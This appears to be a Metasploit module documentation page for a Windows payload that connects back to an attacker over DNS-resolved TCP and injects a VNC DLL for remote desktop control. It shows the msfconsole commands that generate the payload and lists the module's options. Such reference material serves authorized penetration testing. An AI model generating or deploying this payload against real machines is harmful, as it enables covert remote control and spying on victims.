VNC Server (Reflective Injection), Reverse TCP Stager (DNS) | Metasploit Exploit Database (DB)

VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)

Search Other Modules


Rank

  • Normal

Authors

  • sf < stephen_fewer [at] harmonysecurity.com >
  • hdm < hdm [at] metasploit.com >
  • skape < mmiller [at] hick.org >

Vulnerability References


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/windows/vncinject/reverse_tcp_dns
msf payload(reverse_tcp_dns) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp_dns) > generate


Module Options

AUTOVNC Automatically launch VNC viewer if present (default: true)
EXITFUNC Exit technique: thread, process, seh, none (default: process)
LHOST The DNS hostname to connect back to
LPORT The listen port (default: 4444)
VNCHOST The local host to use for the VNC proxy (default: 127.0.0.1)
VNCPORT The local port to use for the VNC proxy (default: 5900)
DisableCourtesyShell Disables the Metasploit Courtesy shell
DisableSessionTracking Disables the VNC payload from following the active session as users log in an out of the input desktop
ReverseConnectRetries The number of connection attempts to try before exiting the process
ReverseListenerBindAddress The specific IP address to bind to on the local system
ReverseListenerComm The specific communication channel to use for this listener
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module